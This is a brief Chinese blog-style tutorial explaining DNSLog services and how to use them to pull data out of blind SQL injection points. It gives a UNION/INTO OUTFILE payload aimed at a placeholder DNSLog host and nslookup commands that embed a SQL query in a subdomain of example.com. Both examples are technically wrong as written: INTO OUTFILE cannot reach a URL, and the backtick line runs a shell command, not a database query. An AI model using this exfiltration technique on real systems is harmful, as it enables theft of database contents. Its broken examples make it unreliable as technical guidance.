DNSLog概念
DNSLog(域名系统日志)是一种特殊的技术和服务,用于捕获和记录通过域名系统(DNS)协议进行的请求和响应。它的目的是帮助用户跟踪、分析和管理DNS流量,并收集与域名相关的信息。
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。当客户端(如Web浏览器、应用程序)发送DNS请求时,服务器将记录请求,然后产生一个响应,响应中包含一些原始请求信息。这些信息可以包括IP地址、用户代理字符串、时间戳和其他相关的数据。
DNSLog无回显注入的原理
无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。
利用DNSLog实现无回显注入的步骤
-
构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。例如,在SQL注入攻击的情况下,可以使用如下payload:
' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --
这个负载将触发一个DNS请求,将目标应用程序中的列名信息发送到DNSLog服务。
-
插入payload:在目标应用程序的注入点处插入payload。具体方法取决于目标应用程序的结构和漏洞点。通常,注入点位于应用程序的输入字段中。
-
触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
-
检查DNSLog服务:访问您选择的DNSLog服务,检查是否收到DNS请求。如果成功触发注入,您将能够在DNSLog服务上看到相应的请求记录。
举个栗子
利用DNSLog获取数据库表信息
注入点:在目标应用程序中找到注入点,构造注入语句。
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
将注入语句作为DNS请求的一部分,发送到DNSLog服务器。
nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com
在DNSLog服务器上查看DNS请求的响应,获取注入结果。
nslookup -type=txt SELECT.*.example.com
图解
大家可以参考大佬的文章
SQL注入之dnslog注入 – ngin0x's blog